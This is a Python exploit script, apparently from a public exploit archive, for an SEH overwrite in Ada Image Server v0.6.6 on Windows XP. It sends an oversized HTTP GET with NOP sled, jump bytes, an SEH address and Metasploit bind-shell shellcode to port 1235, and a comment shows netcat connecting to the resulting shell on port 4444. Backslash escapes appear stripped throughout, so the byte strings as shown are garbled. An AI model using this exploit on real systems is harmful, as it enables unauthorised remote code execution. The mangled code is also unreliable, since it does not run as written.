#!/usr/bin/python
# Only usable module with safeseh disabled on XP SP2 and XP SP3 is imgsrv.exe.
# However, it contains a null character in the address (ex: XP SP3 => 00689aff).
# Versions above 0.6.7 do not seem to be vulnerable.
# 
# $ ./imgsrv.py 192.168.1.146
#
# [*] Ada Image Server v0.6.6 SEH Overwrite
# [*] Discovered/Exploited by Blake
# [*] Tested on XP SP1
#
# [+] Connecting to 192.168.1.146
# [+] Sending payload
# [+] Payload Sent
#
# $ nc 192.168.1.146 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Program FilesImgsvr>

import socket, sys

print "n[*] Ada Image Server v0.6.6 SEH Overwrite"
print "[*] Discovered/Exploited by Blake"
print "[*] Tested on XP SP1n"

if len(sys.argv)!= 2:
	print "[*] Usage: %s <ip>n" % sys.argv[0]
	sys.exit(0)

host = sys.argv[1]
port = 1235		# default port

# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=

shellcode = (
"x89xe1xdaxd5xd9x71xf4x5ex56x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx43x5ax4ax4bx50x4dx4dx38x4cx39x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx51x34x47x54x4cx4b"
"x51x55x47x4cx4cx4bx43x4cx44x45x42x58x45x51x4a"
"x4fx4cx4bx50x4fx45x48x4cx4bx51x4fx47x50x43x31"
"x4ax4bx47x39x4cx4bx47x44x4cx4bx43x31x4ax4ex46"
"x51x49x50x4dx49x4ex4cx4dx54x49x50x43x44x44x47"
"x49x51x48x4ax44x4dx43x31x48x42x4ax4bx4cx34x47"
"x4bx51x44x47x54x47x58x44x35x4ax45x4cx4bx51x4f"
"x51x34x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b"
"x4dx59x42x4cx46x44x45x4cx45x31x48x43x50x31x49"
"x4bx43x54x4cx4bx50x43x46x50x4cx4bx47x30x44x4c"
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx47x30x43x38x51"
"x4ex42x48x4cx4ex50x4ex44x4ex4ax4cx50x50x4bx4f"
"x4ex36x45x36x50x53x43x56x43x58x46x53x46x52x45"
"x38x42x57x43x43x46x52x51x4fx51x44x4bx4fx48x50"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx48"
"x56x51x4fx4cx49x4dx35x45x36x4bx31x4ax4dx44x48"
"x43x32x50x55x42x4ax43x32x4bx4fx4ex30x45x38x48"
"x59x43x39x4ax55x4ex4dx46x37x4bx4fx4ex36x51x43"
"x51x43x51x43x51x43x51x43x51x53x51x43x50x43x50"
"x53x4bx4fx48x50x45x36x43x58x42x31x51x4cx45x36"
"x51x43x4dx59x4dx31x4ax35x43x58x4ex44x45x4ax44"
"x30x48x47x46x37x4bx4fx49x46x42x4ax42x30x46x31"
"x50x55x4bx4fx48x50x42x48x49x34x4ex4dx46x4ex4d"
"x39x46x37x4bx4fx4ex36x46x33x50x55x4bx4fx48x50"
"x43x58x4bx55x50x49x4cx46x50x49x46x37x4bx4fx4e"
"x36x50x50x51x44x50x54x50x55x4bx4fx48x50x4ax33"
"x42x48x4bx57x44x39x48x46x44x39x51x47x4bx4fx49"
"x46x46x35x4bx4fx48x50x45x36x42x4ax43x54x43x56"
"x42x48x42x43x42x4dx4bx39x4bx55x42x4ax50x50x50"
"x59x51x39x48x4cx4cx49x4ax47x43x5ax47x34x4bx39"
"x4ax42x46x51x49x50x4cx33x4ex4ax4bx4ex47x32x46"
"x4dx4bx4ex47x32x46x4cx4dx43x4cx4dx42x5ax50x38"
"x4ex4bx4ex4bx4ex4bx45x38x43x42x4bx4ex4ex53x44"
"x56x4bx4fx42x55x47x34x4bx4fx4ex36x51x4bx50x57"
"x51x42x50x51x50x51x50x51x42x4ax45x51x50x51x50"
"x51x50x55x50x51x4bx4fx4ex30x42x48x4ex4dx4ex39"
"x44x45x48x4ex46x33x4bx4fx49x46x43x5ax4bx4fx4b"
"x4fx46x57x4bx4fx48x50x4cx4bx50x57x4bx4cx4bx33"
"x49x54x42x44x4bx4fx49x46x50x52x4bx4fx48x50x43"
"x58x4cx30x4cx4ax43x34x51x4fx51x43x4bx4fx48x56"
"x4bx4fx4ex30x41x41")


payload = "x41" * 19000			# overwrites seh handler at 19734
nops = "x90" * 29				# nop sled				
sc = shellcode					# shellcode - 696 bytes
near_jmp = "xe9x44xfdxffxff"		# jump back -700 bytes
next_seh = "xebxf9xffxff"			# jump back -7 bytes 
seh = "x10xbfxc1x77"			# c:windowssystem32msvcrt.dll
junk = "x43" * 262				# junk buffer


print "[+] Connecting to %s" % host
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	s.connect((host,port))
except:
	print "[x] Could not connect!n"
	sys.exit(0)	

print "[+] Sending payload"
s.send("GET /" + payload + nops + sc + near_jmp + next_seh + seh + junk + " HTTP/1.0rnrn")
s.close()
print "[+] Payload Sentn"